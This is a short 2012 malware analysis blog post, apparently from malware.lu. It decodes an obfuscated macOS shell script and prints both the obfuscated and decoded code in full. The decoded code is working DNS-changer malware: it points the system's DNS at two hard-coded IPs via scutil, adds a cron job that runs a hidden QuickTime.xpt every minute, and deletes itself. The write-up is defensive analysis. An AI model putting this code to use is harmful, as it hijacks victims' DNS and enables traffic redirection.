Analysis of an obfucated script (MacOS)

Published on 2012-05-20 14:00:00.

We received a script via our submit mecanism. This script is obfuscated. The code source:

#!/bin/sh
x=cat "$0" |wc -l|awk '{print $1}';x=expr $x - 2;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aae.zs;s2=cx.zxx.aaz.acs;sh 1 echo $s1|tr qazwsxedcr 0123456789 echo $s2| tr qazwsxedcr 0123456789;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2 
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=ljnfxab -i|tjkd QvplgTphk.edx pr [ "$kepox" == "" ]; xykf
      klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
      ljnfxab ljnf.pfox
      jh -jr ljnf.pfox
rp
jh -jr "$0"

The 2 firsts lines decode the script:

x=cat "$0" |wc -l|awk '{print $1}' x=expr $x - 2 tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1
s1=cx.zxx.aae.zs
s2=cx.zxx.aaz.acs
sh 1 echo $s1|tr qazwsxedcr 0123456789 echo $s2| tr qazwsxedcr 0123456789 exit

The 3 first lines jump the 2 first line, decode the file and create a new file called 1.

rootbsd@malware.lu$ tail -23 216ce676b94128fef68858439dac1f6b6bf1f47d5b335c94547d04d6c750ffee | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2 
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=crontab -l|grep QuickTime.xpt if [ "$exist" == "" ]; then
        echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
        crontab cron.inst
        rm -rf cron.inst
fi
rm -rf "$0"

Two arguments are passed to the new script.

roobtsd@malware.lu$ echo cx.zxx.aae.zs |tr qazwsxedcr 0123456789
85.255.116.24
rootbsd@malware.lu$ echo cx.zxx.aaz.acs | tr qazwsxedcr 0123456789
85.255.112.184

These two IP come from Ukraine. This script modifies the DNS servers on MacOS.